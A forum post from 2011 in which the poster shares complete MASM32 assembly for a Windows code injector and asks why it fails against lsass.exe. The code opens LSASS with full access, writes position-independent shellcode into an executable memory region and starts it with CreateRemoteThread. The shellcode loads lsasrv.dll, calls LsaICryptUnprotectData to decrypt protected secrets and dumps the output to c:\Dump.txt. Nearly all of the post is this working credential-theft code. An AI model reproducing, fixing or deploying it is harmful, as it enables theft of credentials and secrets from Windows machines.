AgentSmithers
May 12th, 2011, 09:04 PM
.386                                    ; 32-bit x86 only: the fs:[30h] PEB walk in Injected assumes a 32-bit process
.model flat,stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
include \masm32\include\user32.inc
include \masm32\include\lsasrv.inc     ; supplies the LsaICryptUnprotectData prototype used via (type ...) below
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\user32.lib
includelib \masm32\lib\lsasrv.lib
.const
PROCESS_HANDLE equ 0                    ; FindProcessByName _returntype: return an OpenProcess handle
PROCESS_ID equ 1                        ; FindProcessByName _returntype: return the raw th32ProcessID
.data
szProcess db 'lsass.exe',0              ; target image name, compared case-insensitively by FindProcessByName
szKernel db 'KERNEL32',0                ; module name passed to GetModuleHandle in start
szGetProcAddress db 'GetProcAddress',0  ; export resolved in the injector and handed to the remote thread as its parameter
.data?
hProcess dd ?                           ; handle to the target process (from FindProcessByName)
lpInjected dd ?                         ; base of the region VirtualAllocEx returns in the target
lenInjected dd ?                        ; byte length of Injected..EndInjected
pInfo PROCESS_INFORMATION <>            ; not referenced anywhere in this file
sInfo STARTUPINFO <>                    ; not referenced anywhere in this file
Injected PROTO:DWORD                    ; prototype for the commented-out in-process test call in start
;-----------------------------------------------------------------------
; Injected(lpGetProcAddress)
; Position-independent payload: start copies the bytes Injected..EndInjected
; into the target process and runs them there on a new thread.
; In:    lpGetProcAddress = address of kernel32!GetProcAddress as resolved
;        in the injector (see start). NOTE(review): this only resolves
;        correctly in the target if kernel32 is mapped at the same base
;        there -- confirm for the intended OS.
; Does:  finds kernel32 through the PEB module list, resolves LoadLibraryA,
;        loads lsasrv.dll, calls LsaICryptUnprotectData into Buffer, writes
;        Buffer to c:\Dump.txt and terminates its own thread.
; Out:   never returns (ExitThread). The dropped file c:\Dump.txt is the
;        only persistent artifact of this routine.
; Clobb: eax, ecx, esi, edi; ebp is saved/restored around the module walk.
; Note:  every string is embedded in .code and addressed with the call/pop
;        idiom, so the copied bytes carry no absolute data references.
;-----------------------------------------------------------------------
Injected PROC lpGetProcAddress:DWORD
LOCAL Stack[20h]:dword                  ; table of resolved pointers, see index map below
LOCAL entropy[16]:byte                  ; entropy buffer handed to LsaICryptUnprotectData (never written here)
LOCAL Buffer[100h]:byte                 ; receives the decrypted output
LOCAL cbSize:dword                      ; receives the output size from LsaICryptUnprotectData
LOCAL BytesReturned:dword               ; bytes written by WriteFile
; Stack[] index map: +0 GetProcAddress, +4 kernel32 base, +8 LoadLibraryA,
; +12 lsasrv.dll base, +16 LsaICryptUnprotectData, +20 CreateFileA,
; +24 WriteFile, +28 ExitThread
ASSUME fs:NOTHING                       ; permit fs:[...] operands
push ebp                                ; ebp is borrowed as scratch below; the LOCALs are ebp-relative so it must be restored first
xor eax,eax                             ; eax = 0: zero index for the fs load and the NUL byte compared in the loop
mov esi,fs:[eax+30h]                    ; esi = PEB
mov esi,[esi+0Ch]                       ; esi = PEB->Ldr
mov esi,[esi+1Ch]                       ; esi = first InInitializationOrderModuleList entry
next_module:
mov ebp,[esi+08h]                       ; ebp = DllBase of this entry
mov edi,[esi+20h]                       ; edi = BaseDllName.Buffer (UTF-16)
mov esi,[esi]                           ; advance to the next entry before testing this one
cmp [edi+12*2],al                       ; name exactly 12 wide chars? (strlen("kernel32.dll") == 12)
jne next_module
cmp byte ptr[edi],6Bh                   ; first char 'k' ...
je find_kernel32_finished
cmp byte ptr[edi],4Bh                   ; ... or 'K'; either case accepted
je find_kernel32_finished
jmp next_module
find_kernel32_finished:
mov ecx,ebp                             ; ecx = kernel32 base
pop ebp                                 ; frame pointer back before any LOCAL is touched
mov eax,lpGetProcAddress
mov Stack,eax                           ; Stack[+0]  = GetProcAddress
mov Stack+4,ecx                         ; Stack[+4]  = kernel32 base
call loc_1                              ; call/pop idiom: pushes the address of the string that follows
_szLoadLibraryA db "LoadLibraryA",0
loc_1:
pop ecx                                 ; ecx -> "LoadLibraryA"
invoke (type GetProcAddress)ptr Stack,Stack+4,ecx
mov Stack+8,eax                         ; Stack[+8]  = LoadLibraryA
call loc_2
_szlsasrv db "lsasrv.dll",0
loc_2:
pop ecx                                 ; ecx -> "lsasrv.dll"
invoke (type LoadLibrary)ptr Stack+8,ecx
mov Stack+12,eax                        ; Stack[+12] = lsasrv.dll base
call loc_3
_szLsaICryptUnprotectData db "LsaICryptUnprotectData",0
loc_3:
pop ecx                                 ; ecx -> "LsaICryptUnprotectData"
invoke (type GetProcAddress)ptr Stack,Stack+12,ecx
mov Stack+16,eax                        ; Stack[+16] = LsaICryptUnprotectData
invoke (type LsaICryptUnprotectData)ptr Stack+16, ADDR Buffer,0FFFFh, 0, 0, 0, 0, 20000041h, 0, ADDR entropy, ADDR cbSize ; the 0FFFFh and 20000041h arguments are not explained in this file -- see the prototype in lsasrv.inc
call loc_4
_szCreateFileA db "CreateFileA",0
loc_4:
pop ecx                                 ; ecx -> "CreateFileA"
invoke (type GetProcAddress)ptr Stack,Stack+4,ecx
mov Stack+20,eax                        ; Stack[+20] = CreateFileA
call loc_5
_szWriteFile db "WriteFile",0
loc_5:
pop ecx                                 ; ecx -> "WriteFile"
invoke (type GetProcAddress)ptr Stack,Stack+4,ecx
mov Stack+24,eax                        ; Stack[+24] = WriteFile
call loc_6
_szExitThread db "ExitThread",0
loc_6:
pop ecx                                 ; ecx -> "ExitThread"
invoke (type GetProcAddress)ptr Stack,Stack+4,ecx
mov Stack+28,eax                        ; Stack[+28] = ExitThread
call loc_7
FileName db "c:\Dump.txt", 0            ; output path written from inside the target process
loc_7:
pop ecx                                 ; ecx -> "c:\Dump.txt"
;BreakpointHere db 0cch
invoke (type CreateFileA)ptr Stack+20, ECX, GENERIC_WRITE, 7, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0 ; dwShareMode 7 = FILE_SHARE_READ|FILE_SHARE_WRITE|FILE_SHARE_DELETE
mov ecx, eax                            ; ecx = file handle; INVALID_HANDLE_VALUE on failure is not checked
invoke (type WriteFile)ptr Stack+24, ECX, ADDR Buffer, 0FFFFh, ADDR BytesReturned, 0
invoke (type ExitThread)ptr Stack+28, 0 ; ends the injected thread; the file handle is never closed
ret                                     ; unreachable: ExitThread does not return
Injected endp
EndInjected:                            ; end marker; start computes lenInjected = EndInjected - Injected
;-----------------------------------------------------------------------
; FindProcessByName(_exename, _returntype)
; Walks a Toolhelp process snapshot comparing each szExeFile with _exename
; (case-insensitive, lstrcmpi).
; In:    _exename    = NUL-terminated image name (szProcess from start)
;        _returntype = PROCESS_HANDLE -> eax = OpenProcess(PROCESS_ALL_ACCESS) handle
;                      PROCESS_ID     -> eax = th32ProcessID
; Out:   eax as above. When nothing matches, the loop ends with eax = FALSE
;        (0) and that value is what reaches OpenProcess / the caller.
; Note:  the snapshot handle is always closed here; an OpenProcess handle
;        belongs to the caller (start never closes it).
; Saves: ebx, ecx, edx, esi, edi via the uses list.
;-----------------------------------------------------------------------
FindProcessByName proc uses ebx ecx edx esi edi _exename:dword,_returntype:dword
LOCAL Process :PROCESSENTRY32
lea esi,Process                         ; esi -> local PROCESSENTRY32
assume esi:ptr PROCESSENTRY32           ; enable [esi].field syntax
mov [esi].dwSize, sizeof PROCESSENTRY32 ; Toolhelp requires dwSize before Process32First
invoke CreateToolhelp32Snapshot,TH32CS_SNAPPROCESS,0
mov edi,eax                             ; edi = snapshot handle (not validated)
invoke Process32First,edi,esi
.while eax!=FALSE                       ; loop while Process32First/Next report an entry
lea eax,[esi].szExeFile
invoke lstrcmpi,eax,_exename
.if eax==0
;---found process---
mov eax,[esi].th32ProcessID             ; eax = PID of the match
jmp @return
.endif
invoke Process32Next,edi,esi
.endw
@return:
assume esi:nothing
push eax                                ; keep the PID (or FALSE) across CloseHandle
invoke CloseHandle,edi
pop eax
.if _returntype==PROCESS_HANDLE
invoke OpenProcess,PROCESS_ALL_ACCESS,0,eax ;return hProcess
.endif
ret
FindProcessByName endp
;-----------------------------------------------------------------------
; start -- injector entry point.
; Copies the bytes Injected..EndInjected into the process named by
; szProcess and starts them there on a new thread, passing the
; injector-side address of GetProcAddress as the thread parameter.
; From a defender's view the observable sequence is: OpenProcess with
; PROCESS_ALL_ACCESS on lsass.exe, VirtualAllocEx of a
; PAGE_EXECUTE_READWRITE region, WriteProcessMemory into it,
; CreateRemoteThread with a start address in that unbacked region, and
; the file c:\Dump.txt created from inside the target.
; No API return value is checked before it is used.
;-----------------------------------------------------------------------
start:
; The next four commented-out lines are an in-process test path that runs Injected locally instead of remotely.
;invoke GetModuleHandle,addr szKernel
;invoke GetProcAddress,eax,addr szGetProcAddress
;invoke Injected, EAX
;invoke ExitProcess,0
mov ebx,EndInjected                     ; lenInjected = EndInjected - Injected (payload size in bytes)
sub ebx,Injected
mov lenInjected,ebx
invoke FindProcessByName,ADDR szProcess,PROCESS_HANDLE ; eax = PROCESS_ALL_ACCESS handle to lsass.exe (unchecked)
mov hProcess, eax
invoke VirtualAllocEx,hProcess, 0, lenInjected, MEM_COMMIT+MEM_RESERVE,PAGE_EXECUTE_READWRITE ; RWX region in the target sized to the payload
mov lpInjected,eax
invoke WriteProcessMemory,hProcess,lpInjected,Injected,lenInjected,0 ; copy the payload bytes into the target
invoke GetModuleHandle,addr szKernel
invoke GetProcAddress,eax,addr szGetProcAddress ; eax = injector-side GetProcAddress; NOTE(review): assumes kernel32 shares its base with the target
invoke CreateRemoteThread,hProcess,0,0,lpInjected,eax,0,0 ; run Injected(eax) inside the target
invoke ExitProcess,0                    ; hProcess is never closed
end start
I wrote a lot of this code from scratch and the rest from snippets.
Everything here seems to work fine with calc.exe, although calc.exe of course does not have access to the encrypted data; but when I run it targeting Lsass.exe it does not execute correctly. Does anyone have any idea how this is done correctly?
EDIT:
I am guessing this is the issue =(
http://mnin.blogspot.com/2007/05/injecting-code-into-privileged-win32.html